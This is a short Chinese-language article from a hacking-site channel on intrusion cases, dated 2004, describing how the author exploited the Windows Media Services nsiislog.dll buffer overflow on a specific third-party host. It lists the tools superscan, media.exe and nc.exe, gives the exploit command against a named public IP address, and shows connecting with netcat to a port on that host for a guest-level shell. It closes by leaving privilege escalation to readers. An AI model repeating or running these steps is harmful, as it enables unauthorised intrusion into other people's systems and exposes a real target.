您的位置:积木首页 >> 黑客技术频道 >> 入侵实例 >> 正文:
标题:利用1755端口获取guest权限
时间:2004-9-29 来源:不详 浏览数:
Windows Media服务nsiislog.dll远程缓冲区溢出漏洞


至于该漏洞的成因和详细描述我就在这里不详细介绍了。



一 工具



superscan



media.exe



nc.exe



二 溢出



查找该漏洞的依据是\s cripts\nsiislog.dll



最简单的方法就是用superscan扫描开放1755端口的主机,当然几率还是很小的



下面是我找到的一台存在此漏洞的主机。



接下来溢出



使用工具media.exe



格式



media ip -p port -r 路径



我扫描到的漏洞主机IP地址是:218.61.84.53



所以溢出格式是



media.exe 218.61.84.53 -p 80 -r /s cripts/nsiislog.dll



溢出以后用nc连接。端口是34816



nc -vv 218.61.84.53 34816



OK拿到shell是guest权限。至于怎么提升权限大家各显神通吧:)


(责任编辑:笑虎)
最近更新
今日推荐
热点文章